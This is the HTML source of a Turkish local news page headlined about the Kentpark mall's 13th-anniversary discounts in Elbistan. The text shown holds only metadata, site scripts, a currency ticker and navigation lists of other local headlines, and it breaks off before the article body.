  <!DOCTYPE html>
<html lang="tr" class="sayfa-haber hs-rush no-inlinesvg site-center" itemscope itemtype="http://schema.org/NewsArticle">
  <head>
    <title>Kentpark’tan 13. yıla özel indirimler</title>
<meta charset="utf-8">
<!--meta name="viewport" content="width=device-width, initial-scale=1.0"-->
<meta name="description" content="Elbistan&#039;ın en büyük alışveriş merkezlerinden olan Kentpark AVM, kuruluşunun 13. yılına özel indirim kampanyası başlattı." />
<meta name="keywords" content="Kentparktan 13. yıla özel indirimler" />
<meta name="news_keywords" content="Kentparktan 13. yıla özel indirimler">
<meta name="author" content="Elbistanın Sesi" /><meta property="og:site_name" content="Elbistanın Sesi" />
<meta property="og:title" content="Kentpark’tan 13. yıla özel indirimler" />
<meta property="og:description" content="Elbistan&#039;ın en büyük alışveriş merkezlerinden olan Kentpark AVM, kuruluşunun 13. yılına özel indirim kampanyası başlattı." />
  <meta property="og:image" content="http://www.elbistaninsesi.com/images/haberler/2021/08/kentparktan_13_yila_ozel_indirimler_h70944_10c87.jpg" />
<meta property="og:type" content="article" />
<meta property="og:url" content="http://www.elbistaninsesi.com/guncel/kentparktan-13-yila-ozel-indirimler-h70944.html" /><meta http-equiv="refresh" content="3000" /><meta name="twitter:card" content="summary_large_image" />
<meta property="og:title" content="Kentpark’tan 13. yıla özel indirimler" />
<meta name="twitter:url" content="http://www.elbistaninsesi.com/guncel/kentparktan-13-yila-ozel-indirimler-h70944.html" />
<meta name="twitter:domain" content="http://www.elbistaninsesi.com/" />
<meta name="twitter:site" content="elbistaninsesi" />
<meta name="twitter:title" content="Kentpark’tan 13. yıla özel indirimler" />
<meta name="twitter:description" content="Elbistan’ın en büyük alışveriş merkezlerinden olan Kentpark AVM, kuruluşunun 13. yılına özel indirim kampanyası başlattı." />
<meta name="twitter:image:src" content="http://www.elbistaninsesi.com/images/haberler/2021/08/kentparktan_13_yila_ozel_indirimler_h70944_10c87.jpg" /><link rel="alternate" href="http://www.elbistaninsesi.com/guncel/kentparktan-13-yila-ozel-indirimler-h70944.html" hreflang="tr" />

<link href='https://fonts.googleapis.com/css?family=Oswald&amp;subset=latin,latin-ext' rel='stylesheet' type='text/css'>
<link href='https://fonts.googleapis.com/css?family=Roboto:400,400italic,500,500italic,700&amp;subset=latin,latin-ext' rel='stylesheet' type='text/css'>
<link href="http://www.elbistaninsesi.com/_themes/hs-rush-php/style/compress.css" rel="stylesheet"/>
<link href="http://www.elbistaninsesi.com/_themes/hs-rush-php/style/renk.css" rel="stylesheet"/><link href="http://www.elbistaninsesi.com/_themes/hs-rush-php/style/print.css" rel="stylesheet" media="print"/>
<link rel="alternate" type="application/rss+xml" title="RSS servisi" href="http://www.elbistaninsesi.com/rss.php" />
<link itemprop="mainEntityOfPage" rel="canonical" href="http://www.elbistaninsesi.com/guncel/kentparktan-13-yila-ozel-indirimler-h70944.html">
<link rel="amphtml" href="http://www.elbistaninsesi.com/amp/guncel/kentparktan-13-yila-ozel-indirimler-h70944.html">
  <link rel="image_src" type="image/jpeg" href="http://www.elbistaninsesi.com/images/haberler/2021/08/kentparktan_13_yila_ozel_indirimler_h70944_10c87.jpg" />
<meta property="og:image:width" content="768"/>
<meta property="og:image:height" content="432"/>
<meta itemprop="headline" content="Kentpark’tan 13. yıla özel indirimler" />
<meta itemprop="thumbnailUrl" content="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/08/kentparktan_13_yila_ozel_indirimler_h70944_10c87.jpg" />
<meta itemprop="articleSection" content="Güncel" name="section" />
<meta itemprop="dateCreated" content="2021-08-21T09:50:27+02:00" />
<meta itemprop="image" content="http://www.elbistaninsesi.com/images/haberler/2021/08/kentparktan_13_yila_ozel_indirimler_h70944_10c87.jpg" />
<meta itemprop="genre" content="news" name="medium" />
<meta itemprop="inLanguage" content="tr-TR" />
<meta itemprop="keywords" content="Kentparktan 13. yıla özel indirimler" name="keywords" />




<!--[if gte IE 9]>
<style type="text/css">.gradient {filter: none;}</style>
<![endif]-->
<!--[if IE 7]>
<style type="text/css">.reklam.dikey.sol .fixed{margin-left:-px;}</style>
<![endif]-->

<script type="text/javascript">
var site_url = 'http://www.elbistaninsesi.com/',
tema = 'hs-rush-php',
surum = '1.6.5',
sistem = '5.11',
theme_path = 'http://www.elbistaninsesi.com/_themes/hs-rush-php/',
ajax_url = '_ajax/',
cat_limit = '10',
headerayar = 'header_genis',
poll_voted = '',
comment_approved = '',
lazyload = '0',
twitter_user  = 'elbistaninsesi',
facebook_user = 'elbistaninsesi',
popup_saat = '1',
yorum_harf_ayar = '1',
iftara_kalan_sure = '0',
namaz_default = 'kahramanmaras',
uye_gir = 'Üye Girişi',
uye_ol = 'Üye Ol',
cikis_yap = 'Çıkış Yap',
baglan_fb = 'Facebook ile Bağlan',
analitik_ga = 'UA-21655627-1';
</script>

    <!--[if lt IE 9]>
      <script src="http://html5shim.googlecode.com/svn/trunk/html5.js"></script>
    <![endif]-->
      </head>
  <body class="hs-lch">

    
        
    
        
        <!-- HEADER -->
    <div id="siteHeader" class="header clearfix">
      <div id="header-top" class="header-top hs-bgc clearfix">
  <div class="header-top-container">

    
    

    <div class="header-top-block header-top-cycle">
            <div class="header-top-currency">
        <div class="currency-cycle">
          <div class="hs-bgc currency-dolar glyphicons white usd">DOLAR <span class="currency-rate">8.4864</span></div>
          <div class="hs-bgc currency-euro glyphicons white euro">EURO <span class="currency-rate">9.9868</span></div>
          <div class="hs-bgc currency-altin glyphicons white coins">ALTIN <span class="currency-rate">486.10</span></div>
          <div class="hs-bgc currency-bist glyphicons white global">BIST <span class="currency-rate">1444.63</span></div>
        </div>
      </div>
      
      <div class="header-top-hot mleft">
        <div class="hot-cycle">
                            <div class="hs-bgc">
                  <a class="glyphicons white history hs-sdch rotateIn" href="http://www.elbistaninsesi.com/guncel/tohumunu-avrupadan-getirdi-dev-kabak-gorenleri-sasirtiyor-h70945.html" title="Tohumunu Avrupa’dan getirdi, dev kabak görenleri şaşırtıyor" >Tohumunu Avrupa’dan getirdi, dev kabak görenleri şaşırtıyor</a>
                </div>
                            <div class="hs-bgc">
                  <a class="glyphicons white history hs-sdch rotateIn" href="http://www.elbistaninsesi.com/guncel/kentparktan-13-yila-ozel-indirimler-h70944.html" title="Kentpark’tan 13. yıla özel indirimler" >Kentpark’tan 13. yıla özel indirimler</a>
                </div>
                            <div class="hs-bgc">
                  <a class="glyphicons white history hs-sdch rotateIn" href="http://www.elbistaninsesi.com/guncel/siyah-cekirdekte-erken-hasat-uyarisi-h70941.html" title="Siyah çekirdekte erken hasat uyarısı" >Siyah çekirdekte erken hasat uyarısı</a>
                </div>
                            <div class="hs-bgc">
                  <a class="glyphicons white history hs-sdch rotateIn" href="http://www.elbistaninsesi.com/guncel/kaymakam-demir-sel-ve-taskinin-yasandigi-gecitte-inceleme-h70940.html" title="Kaymakam Demir, sel ve taşkının yaşandığı Geçit’te inceleme yaptı" >Kaymakam Demir, sel ve taşkının yaşandığı Geçit’te inceleme...</a>
                </div>
                            <div class="hs-bgc">
                  <a class="glyphicons white history hs-sdch rotateIn" href="http://www.elbistaninsesi.com/guncel/kodazdan-suriyeli-siginmacilar-aciklamasi-h70939.html" title="Kodaz’dan Suriyeli sığınmacılar açıklaması" >Kodaz’dan Suriyeli sığınmacılar açıklaması</a>
                </div>
                            <div class="hs-bgc">
                  <a class="glyphicons white history hs-sdch rotateIn" href="http://www.elbistaninsesi.com/guncel/baskan-gurbuz-elbistan-dogu-ile-batinin-gecis-noktasi-olacak-h70938.html" title="Başkan Gürbüz: “Elbistan, doğu ile batının geçiş noktası olacak”" >Başkan Gürbüz: “Elbistan, doğu ile batının geçiş noktası olacak”</a>
                </div>
                            <div class="hs-bgc">
                  <a class="glyphicons white history hs-sdch rotateIn" href="http://www.elbistaninsesi.com/guncel/atiksu-aritma-tesisi-hizla-yukseliyor-h70937.html" title="Atıksu Arıtma Tesisi hızla yükseliyor" >Atıksu Arıtma Tesisi hızla yükseliyor</a>
                </div>
                            <div class="hs-bgc">
                  <a class="glyphicons white history hs-sdch rotateIn" href="http://www.elbistaninsesi.com/guncel/vizontele-koyde-projesi-ile-sinema-ayaklarina-geldi-h70936.html" title="Vizontele Köyde&#039; projesi ile sinema ayaklarına geldi" >Vizontele Köyde&#039; projesi ile sinema ayaklarına geldi</a>
                </div>
                            <div class="hs-bgc">
                  <a class="glyphicons white history hs-sdch rotateIn" href="http://www.elbistaninsesi.com/guncel/oztuncun-soru-onergesine-iki-yil-sonra-cevap-geldi-h70934.html" title="Öztunç’un soru önergesine iki yıl sonra cevap geldi" >Öztunç’un soru önergesine iki yıl sonra cevap geldi</a>
                </div>
                            <div class="hs-bgc">
                  <a class="glyphicons white history hs-sdch rotateIn" href="http://www.elbistaninsesi.com/guncel/kahramanmarasta-4-ilcenin-kaymakami-degisti-h70933.html" title="Kahramanmaraş’ta 4 ilçenin kaymakamı değişti " >Kahramanmaraş’ta 4 ilçenin kaymakamı değişti </a>
                </div>
                    </div>
      </div>
    </div>

    <div class="header-top-block header-top-right">
      <div class="header-top-user">

              <div class="btn-group">
                <button class="btn btn-user hs-bgco dropdown-toggle glyphicons white keys" data-toggle="dropdown"></button>
                <ul id="memberArea" class="dropdown-menu hs-bgcd">
                </ul>
              </div>

      </div>
    </div>

      <div id="sb-search" class="header-top-block header-top-search sb-search">
            <form action="http://www.elbistaninsesi.com/" method="get">
              <input type="hidden" name="m" value="arama">


                            

              <input class="sb-search-input hs-bgcd" placeholder="Haber Ara ..." type="search" name="q" id="search">
              <input type="hidden" name="auth" value="3a3eb5f428a9ab10cffcb0d7a94fe3d361bc7256" />
              <input class="sb-search-submit" type="submit" value="">
              <span class="sb-icon-search hs-bgc"></span>
            </form>
          </div>
  </div>
</div>
      <div id="logo" class="container">
  <div class="row">
        <div class="span3">
              <span class="logo"><a href="http://www.elbistaninsesi.com/" class="logo"><img src="http://www.elbistaninsesi.com/images/banner/Ysimsiz-1_2.jpg" alt="Kentpark’tan 13. yıla özel indirimler" /></a></span>
          </div>
    <div class="span9">
          </div>
      </div>
</div>

<div id="menu" class="clearfix">

  <div class="kategori">
    <div class="container">
      <a href="http://www.elbistaninsesi.com/" class="glyphicons home"></a>

      
      
            <a href="http://www.elbistaninsesi.com/yazarlar/" class="glyphicons parents">Yazarlar</a>
      
      

      
              <a title="Vefatlar" href="http://www.elbistaninsesi.com/vefatlar" id="k7"    >Vefatlar</a>
<a title="Güncel" href="http://www.elbistaninsesi.com/guncel" id="k8" class="current"   >Güncel</a>
<a title="Politika" href="http://www.elbistaninsesi.com/politika" id="k2"    >Politika</a>
<a title="Sağlık" href="http://www.elbistaninsesi.com/saglik" id="k4"    >Sağlık</a>
<a title="Eğitim / Kültür" href="http://www.elbistaninsesi.com/egitim-kultur" id="k5"    >Eğitim / Kültür</a>
<a title="Spor" href="http://www.elbistaninsesi.com/spor" id="k1"    >Spor</a>
<a title="Ekonomi" href="http://www.elbistaninsesi.com/ekonomi" id="k3"    >Ekonomi</a>
<a title="Arşiv Özel" href="http://www.elbistaninsesi.com/arsiv-ozel" id="k9"    >Arşiv Özel</a>
<a title="Seçim Sonucu" href="http://www.elbistaninsesi.com/secim-sonucu" id="k13"    >Seçim Sonucu</a>
<a title="YEREL" href="http://www.elbistaninsesi.com/yerel" id="k17"    >YEREL</a>
<div class="other pull-right"><a href="#" class="all glyphicons show_lines" title="Diğer Kategoriler"></a></div>      
      
      
    </div>
  </div>

  <div class="othercat right">
    <div class="container center">
              <a title="ASAYİŞ" href="http://www.elbistaninsesi.com/asayis" id="k19"    >ASAYİŞ</a>
<a title="KÜLTÜR-SANAT" href="http://www.elbistaninsesi.com/kultur-sanat" id="k20"    >KÜLTÜR-SANAT</a>
<a title="GENEL" href="http://www.elbistaninsesi.com/genel" id="k21"    >GENEL</a>
<a title="DÜNYA" href="http://www.elbistaninsesi.com/dunya" id="k22"    >DÜNYA</a>
<a title="EĞİTİM" href="http://www.elbistaninsesi.com/egitim" id="k48"    >EĞİTİM</a>
<a title="ÇEVRE" href="http://www.elbistaninsesi.com/cevre" id="k53"    >ÇEVRE</a>
<a title="MAGAZİN" href="http://www.elbistaninsesi.com/magazin" id="k60"    >MAGAZİN</a>
<a title="HABERDE İNSAN" href="http://www.elbistaninsesi.com/haberde-insan" id="k71"    >HABERDE İNSAN</a>
          </div>
  </div>

  
  <div id="katicerik" class="row-fluid">
    <div class="container"><div class="katelement kat_k7">
<div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/vefatlar/anma-mustafa-abdik-h70943.html" title="Anma / Mustafa Abdik"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/08/anma_mustafa_abdik_h70943_95144.jpg" alt="Anma / Mustafa Abdik" />
Anma / Mustafa Abdik</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/vefatlar/vefat-tesekkur-ali-kayiran-h70942.html" title="Vefat - Teşekkür / Ali Kayıran"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/08/vefat_tesekkur_ali_kayiran_h70942_31c75.jpg" alt="Vefat - Teşekkür / Ali Kayıran" />
Vefat - Teşekkür / Ali Kayıran</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/vefatlar/abdurrezzak-dogan-98-yasinda-h70932.html" title="Abdurrezzak Doğan 98 yaşında"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/08/abdurrezzak_dogan_98_yasinda_h70932_f7b71.jpg" alt="Abdurrezzak Doğan 98 yaşında" />
Abdurrezzak Doğan 98 yaşında</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/vefatlar/turan-kose-88-yasinda-h70922.html" title="Turan Köse 88 Yaşında "><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/08/turan_kose_88_yasinda_h70922_77024.jpg" alt="Turan Köse 88 Yaşında " />
Turan Köse 88 Yaşında </a>
</div>
</div></div><div class="katelement kat_k8">
<div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/guncel/tohumunu-avrupadan-getirdi-dev-kabak-gorenleri-sasirtiyor-h70945.html" title="Tohumunu Avrupa’dan getirdi, dev kabak görenleri şaşırtıyor"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/08/tohumunu_avrupadan_getirdi_dev_kabak_gorenleri_sasirtiyor_h70945_be897.jpg" alt="Tohumunu Avrupa’dan getirdi, dev kabak görenleri şaşırtıyor" />
Tohumunu Avrupa’dan getirdi, dev kabak görenleri şaşırtıyor</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/guncel/kentparktan-13-yila-ozel-indirimler-h70944.html" title="Kentpark’tan 13. yıla özel indirimler"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/08/kentparktan_13_yila_ozel_indirimler_h70944_10c87.jpg" alt="Kentpark’tan 13. yıla özel indirimler" />
Kentpark’tan 13. yıla özel indirimler</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/guncel/siyah-cekirdekte-erken-hasat-uyarisi-h70941.html" title="Siyah çekirdekte erken hasat uyarısı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/08/siyah_cekirdekte_erken_hasat_uyarisi_h70941_e88e5.jpg" alt="Siyah çekirdekte erken hasat uyarısı" />
Siyah çekirdekte erken hasat uyarısı</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/guncel/kaymakam-demir-sel-ve-taskinin-yasandigi-gecitte-inceleme-h70940.html" title="Kaymakam Demir, sel ve taşkının yaşandığı Geçit’te inceleme yaptı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/08/kaymakam_demir_sel_ve_taskinin_yasandigi_gecitte_inceleme_yapti_h70940_9e5d6.jpg" alt="Kaymakam Demir, sel ve taşkının yaşandığı Geçit’te inceleme yaptı" />
Kaymakam Demir, sel ve taşkının yaşandığı Geçit’te inceleme yaptı</a>
</div>
</div></div><div class="katelement kat_k2">
<div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/politika/iyi-partide-mevcut-baskan-huseyin-gul-guven-tazeledi-h66989.html" title="İYİ Parti’de mevcut Başkan Hüseyin Gül, güven tazeledi"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/06/iyi_partide_mevcut_baskan_huseyin_gul_guven_tazeledi_h66989_4ef72.JPG" alt="İYİ Parti’de mevcut Başkan Hüseyin Gül, güven tazeledi" />
İYİ Parti’de mevcut Başkan Hüseyin Gül, güven tazeledi</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/politika/ak-parti-ilce-baskan-adayi-tirastan-aciklama-h66803.html" title="AK Parti İlçe Başkan Adayı Tıraş’tan açıklama"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/05/ak_parti_ilce_baskan_adayi_tirastan_aciklama_h66803_4a4d1.jpg" alt="AK Parti İlçe Başkan Adayı Tıraş’tan açıklama" />
AK Parti İlçe Başkan Adayı Tıraş’tan açıklama</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/politika/baskan-sungur-kongrede-yeniden-aday-olmayacagini-acikladi-h65800.html" title="Başkan Sungur kongrede yeniden aday olmayacağını açıkladı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/02/baskan_sungur_kongrede_yeniden_aday_olmayacagini_acikladi_h65800_70585.jpeg" alt="Başkan Sungur kongrede yeniden aday olmayacağını açıkladı" />
Başkan Sungur kongrede yeniden aday olmayacağını açıkladı</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/politika/mhp-meclis-uyelerinden-birlik-ve-beraberlik-iftari-h63165.html" title="MHP Meclis Üyeleri’nden birlik ve beraberlik iftarı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/06/mhp_meclis_uyelerinden_birlik_ve_beraberlik_iftari_h63165_540b4.JPG" alt="MHP Meclis Üyeleri’nden birlik ve beraberlik iftarı" />
MHP Meclis Üyeleri’nden birlik ve beraberlik iftarı</a>
</div>
</div></div><div class="katelement kat_k4">
<div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/saglik/crown-dental-hasta-kabulune-basladi-h63790.html" title="Crown Dental hasta kabulüne başladı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/08/crown_dental_hasta_kabulune_basladi_h63790_f7c46.JPG" alt="Crown Dental hasta kabulüne başladı" />
Crown Dental hasta kabulüne başladı</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/saglik/uzman-dr-erdinc-hatipsoylu-hasta-kabulune-basladi-h63781.html" title="Uzman Dr. Erdinç Hatipsoylu hasta kabulüne başladı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/08/uzman_dr_erdinc_hatipsoylu_hasta_kabulune_basladi_h63781_4e39a.JPG" alt="Uzman Dr. Erdinç Hatipsoylu hasta kabulüne başladı" />
Uzman Dr. Erdinç Hatipsoylu hasta kabulüne başladı</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/saglik/elbistanda-saglik-kadrosu-guclenmeye-devam-ediyor-h63436.html" title="Elbistan’da sağlık kadrosu güçlenmeye devam ediyor"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/06/elbistanda_saglik_kadrosu_guclenmeye_devam_ediyor_h63436_480cd.JPG" alt="Elbistan’da sağlık kadrosu güçlenmeye devam ediyor" />
Elbistan’da sağlık kadrosu güçlenmeye devam ediyor</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/saglik/edh-obezite-cerrahisinde-soz-sahibi-olmaya-basladi-h63423.html" title="EDH, obezite cerrahisinde söz sahibi olmaya başladı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/06/edh_obezite_cerrahisinde_soz_sahibi_olmaya_basladi_h63423_4b617.JPG" alt="EDH, obezite cerrahisinde söz sahibi olmaya başladı" />
EDH, obezite cerrahisinde söz sahibi olmaya başladı</a>
</div>
</div></div><div class="katelement kat_k5">
<div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/egitim-kultur/maras-savunmasi-belgeselinin-elbistan-bolumu-cekiliyor-h63426.html" title="Maraş Savunması Belgeseli’nin Elbistan bölümü çekiliyor"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/06/maras_savunmasi_belgeselinin_elbistan_bolumu_cekiliyor_h63426_dfbd4.JPG" alt="Maraş Savunması Belgeseli’nin Elbistan bölümü çekiliyor" />
Maraş Savunması Belgeseli’nin Elbistan bölümü çekiliyor</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/egitim-kultur/otizmli-cocuklar-icin-ozel-etkinlik-h62473.html" title="Otizmli çocuklar için özel etkinlik"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/04/otizmli_cocuklar_icin_ozel_etkinlik_h62473_6209c.jpg" alt="Otizmli çocuklar için özel etkinlik" />
Otizmli çocuklar için özel etkinlik</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/egitim-kultur/kadinlara-yonelik-elde-maras-isi-el-nakiscisi-kursu-aciliyor-h61759.html" title="Kadınlara yönelik elde Maraş işi-el nakışçısı kursu açılıyor"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/01/kadinlara_yonelik_elde_maras_isi_el_nakiscisi_kursu_aciliyor_h61759_488fe.jpg" alt="Kadınlara yönelik elde Maraş işi-el nakışçısı kursu açılıyor" />
Kadınlara yönelik elde Maraş işi-el nakışçısı kursu açılıyor</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/egitim-kultur/nurhak-kaymakamligindan-egitime-ozel-destek-h61699.html" title="Nurhak Kaymakamlığı’ndan eğitime özel destek"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/no_headline.jpg" alt="Nurhak Kaymakamlığı’ndan eğitime özel destek" />
Nurhak Kaymakamlığı’ndan eğitime özel destek</a>
</div>
</div></div><div class="katelement kat_k1">
<div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/spor/elbistanspor-kadin-voleybol-takimi-ankaradan-puansiz-dondu-h65794.html" title="Elbistanspor Kadın Voleybol Takımı, Ankara’dan puansız döndü"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/02/elbistanspor_kadin_voleybol_takimi_ankaradan_puansiz_dondu_h65794_499a5.jpg" alt="Elbistanspor Kadın Voleybol Takımı, Ankara’dan puansız döndü" />
Elbistanspor Kadın Voleybol Takımı, Ankara’dan puansız döndü</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/spor/filenin-sultanlari-nevsehiri-agirlayacak-h65558.html" title="Filenin sultanları, Nevşehir’i ağırlayacak"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/01/filenin_sultanlari_nevsehiri_agirlayacak_h65558_a6a90.jpg" alt="Filenin sultanları, Nevşehir’i ağırlayacak" />
Filenin sultanları, Nevşehir’i ağırlayacak</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/spor/ptt-sporu-3-1-yenen-filenin-sultanlari-moral-buldu-h65460.html" title="PTT Spor’u 3-1 yenen filenin sultanları moral buldu"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/01/ptt_sporu_3_1_yenen_filenin_sultanlari_moral_buldu_h65460_2da74.jpg" alt="PTT Spor’u 3-1 yenen filenin sultanları moral buldu" />
PTT Spor’u 3-1 yenen filenin sultanları moral buldu</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/spor/elbistan-in-sultanlari-ndan-onemli-galibiyet-h65021.html" title="Elbistan&#039;ın Sultanları&#039;ndan önemli galibiyet"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/12/elbistan_in_sultanlari_dan_onemli_galibiyet_h65021_ff6ef.jpg" alt="Elbistan&#039;ın Sultanları&#039;ndan önemli galibiyet" />
Elbistan&#039;ın Sultanları&#039;ndan önemli galibiyet</a>
</div>
</div></div><div class="katelement kat_k3">
<div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/ekonomi/mikrokredi-destegi-koronavirus-doneminde-de-devam-ediyor-h67098.html" title="Mikrokredi desteği koronavirüs döneminde de devam ediyor"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/07/mikrokredi_destegi_koronavirus_doneminde_de_devam_ediyor_h67098_5fc86.jpg" alt="Mikrokredi desteği koronavirüs döneminde de devam ediyor" />
Mikrokredi desteği koronavirüs döneminde de devam ediyor</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/ekonomi/baris-pinari-harekatinda-teror-orgutune-buyuk-darbe-h64435.html" title="Barış Pınarı Harekatı’nda terör örgütüne büyük darbe"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/10/baris_pinari_harekatinda_teror_orgutune_buyuk_darbe_h64435_aec94.jpg" alt="Barış Pınarı Harekatı’nda terör örgütüne büyük darbe" />
Barış Pınarı Harekatı’nda terör örgütüne büyük darbe</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/ekonomi/etso-ve-teb-kredi-protokolu-imzaladi-h61756.html" title="ETSO ve TEB kredi protokolü imzaladı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/01/etso_ve_teb_kredi_protokolu_imzaladi_h61756_7542a.jpg" alt="ETSO ve TEB kredi protokolü imzaladı" />
ETSO ve TEB kredi protokolü imzaladı</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/ekonomi/dogakadan-ekinozu-ve-nurhaktaki-yatirimlara-destek-h61675.html" title="DOĞAKA’dan Ekinözü ve Nurhak’taki yatırımlara destek"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/01/dogakadan_ekinozu_ve_nurhaktaki_yatirimlara_destek_h61675_c61db.jpg" alt="DOĞAKA’dan Ekinözü ve Nurhak’taki yatırımlara destek" />
DOĞAKA’dan Ekinözü ve Nurhak’taki yatırımlara destek</a>
</div>
</div></div><div class="katelement kat_k9">
<div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/arsiv-ozel/17-ekim-1968-pazartesi-h3006.html" title="17 EKİM 1968 PAZARTESİ"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/24401.jpg" alt="17 EKİM 1968 PAZARTESİ" />
17 EKİM 1968 PAZARTESİ</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/arsiv-ozel/13-ekim-1968-persembe-h3005.html" title="13 EKİM 1968 PERŞEMBE"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/24398.jpg" alt="13 EKİM 1968 PERŞEMBE" />
13 EKİM 1968 PERŞEMBE</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/arsiv-ozel/17-agustos-1967-persembe-h2896.html" title="17 AĞUSTOS 1967 PERŞEMBE"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/24181.jpg" alt="17 AĞUSTOS 1967 PERŞEMBE" />
17 AĞUSTOS 1967 PERŞEMBE</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/arsiv-ozel/30-mayis-1959-cumartesi-h2893.html" title="30 MAYIS 1959 CUMARTESİ"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/24174.jpg" alt="30 MAYIS 1959 CUMARTESİ" />
30 MAYIS 1959 CUMARTESİ</a>
</div>
</div></div><div class="katelement kat_k13">
<div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/secim-sonucu/16-nisan-2017-anayasa-degisikligi-referandumu-h39059.html" title="16 Nisan 2017 Anayasa Değişikliği Referandumu"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/04/16_nisan_2017_anayasa_degisikligi_referandumu_h39059_39ce8.jpg" alt="16 Nisan 2017 Anayasa Değişikliği Referandumu" />
16 Nisan 2017 Anayasa Değişikliği Referandumu</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/secim-sonucu/1-kasim-2015-26-donem-milletvekili-genel-secimi-h39058.html" title="1 Kasım 2015 26. Dönem Milletvekili Genel Seçimi"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/04/1_kasim_2015_26_donem_milletvekili_genel_secimi_h39058_aa012.jpg" alt="1 Kasım 2015 26. Dönem Milletvekili Genel Seçimi" />
1 Kasım 2015 26. Dönem Milletvekili Genel Seçimi</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/secim-sonucu/7-haziran-2015-25-donem-milletvekili-genel-secimi-h30737.html" title="7 Haziran 2015 25. Dönem Milletvekili Genel Seçimi"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2015-Genel-Secim-Sonuclari_297.jpg" alt="7 Haziran 2015 25. Dönem Milletvekili Genel Seçimi" />
7 Haziran 2015 25. Dönem Milletvekili Genel Seçimi</a>
</div>
</div><div class="kathab"></div></div><div class="katelement kat_k17">
<div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/kahramanmaras/kmtso-baskani-zabun-ktm-tekstil-ve-moda-yolculuguna-yeni-bir-ivme-kazandiracak-h38463.html" title="KMTSO Başkanı Zabun; “KTM, tekstil ve moda yolculuğuna yeni bir ivme kazandıracak”"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/04/kmtso_baskani_zabun_ktm_tekstil_ve_moda_yolculuguna_yeni_bir_ivme_kazandiracak.jpg" alt="KMTSO Başkanı Zabun; “KTM, tekstil ve moda yolculuğuna yeni bir ivme kazandıracak”" />
KMTSO Başkanı Zabun; “KTM, tekstil ve moda yolculuğuna yeni bir ivme kazandıracak”</a>
</div>
